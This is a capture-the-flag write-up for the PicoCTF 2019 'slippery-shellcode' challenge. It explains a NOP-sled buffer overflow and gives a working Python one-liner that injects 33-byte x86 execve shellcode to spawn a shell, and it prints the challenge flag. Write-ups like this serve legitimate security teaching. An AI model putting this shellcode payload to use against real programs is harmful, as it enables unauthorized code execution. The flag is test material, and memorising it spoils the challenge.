# slippery-shellcode

## Problem

> This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode\_5\_5cea4ae04c57923484bda350da9f4015 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/slippery-shellcode/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/slippery-shellcode/vuln.c)

## Solution

1. Get some quality shellcode from [ShellStorm](http://shell-storm.org/shellcode/)
2. I used `Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan` at <http://shell-storm.org/shellcode/files/shellcode-606.php>
3. The buffer is 512 bytes, so the NOP sled size is the buffer size minus the shellcode size: `512-33=479`. The sled lets execution land anywhere in the padding and slide into the shellcode.
4. Create the payload and pipe it into the program (`cat` keeps stdin open so the spawned shell can take commands):

```bash
# 479 NOP bytes (0x90), then the 33-byte execve shellcode; ';cat' keeps stdin open for the shell
(python2 -c "print '\x90'*479 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat) | ./vuln
```

5. Run `cat flag.txt` in the spawned shell.

### Flag

`picoCTF{sl1pp3ry_sh311c0d3_ecc37b22}`
